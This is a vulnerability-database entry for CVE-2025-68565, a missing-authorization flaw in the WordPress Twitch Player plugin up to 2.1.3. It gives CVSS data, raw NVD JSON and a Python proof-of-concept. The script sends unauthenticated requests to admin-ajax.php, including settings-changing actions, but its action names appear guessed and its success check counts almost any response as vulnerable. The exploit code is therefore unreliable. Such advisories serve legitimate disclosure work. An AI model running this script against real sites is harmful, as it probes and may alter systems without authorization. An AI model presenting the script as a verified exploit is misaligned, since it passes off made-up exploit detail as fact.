Security Vulnerability Report
中文
CVE-2025-68565 CVSS 5.3 MEDIUM

CVE-2025-68565

Published: 2025-12-24 13:16:23
Last Modified: 2026-04-27 19:16:31

Description

Missing Authorization vulnerability in JayBee Twitch Player ttv-easy-embed-player allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Twitch Player: from n/a through <= 2.1.3.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

JayBee Twitch Player (ttv-easy-embed-player) <= 2.1.3
WordPress Plugin: ttv-easy-embed-player 所有版本至2.1.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68565 PoC - Missing Authorization in JayBee Twitch Player # This PoC demonstrates how an unauthenticated attacker can access protected plugin functions import requests import sys # Configuration TARGET_URL = "http://target-wordpress-site.com" PLUGIN_ENDPOINT = "/wp-admin/admin-ajax.php" def check_vulnerability(): """ Check if the target is vulnerable to CVE-2025-68565 Missing Authorization in ttv-easy-embed-player plugin """ print("[*] Testing for CVE-2025-68565 - Missing Authorization in JayBee Twitch Player") # Test unauthenticated access to plugin's protected AJAX actions # Replace 'ttv_easy_embed_player_action' with actual vulnerable action names vulnerable_actions = [ 'ttv_save_settings', 'ttv_get_configuration', 'ttv_update_player_options', 'ttv_fetch_twitch_data' ] for action in vulnerable_actions: print(f"\n[*] Testing action: {action}") # Construct POST request without authentication data = { 'action': action, # Add required parameters based on specific vulnerable function } try: response = requests.post( f"{TARGET_URL}{PLUGIN_ENDPOINT}", data=data, timeout=10, verify=False ) # Check if the request was processed without authorization if response.status_code == 200: # Check response for signs of successful unauthorized access if 'success' in response.text or len(response.text) > 0: print(f"[!] VULNERABLE: Action '{action}' processed without authentication!") print(f"[+] Response: {response.text[:200]}...") return True except requests.exceptions.RequestException as e: print(f"[-] Error testing {action}: {e}") print("\n[*] Vulnerability check completed") return False if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = sys.argv[1] result = check_vulnerability() if result: print("\n[+] Target appears to be vulnerable to CVE-2025-68565") else: print("\n[-] Target may not be vulnerable or is already patched")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68565", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:23.340", "lastModified": "2026-04-27T19:16:31.017", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in JayBee Twitch Player ttv-easy-embed-player allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Twitch Player: from n/a through <= 2.1.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/ttv-easy-embed-player/vulnerability/wordpress-twitch-player-plugin-2-1-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}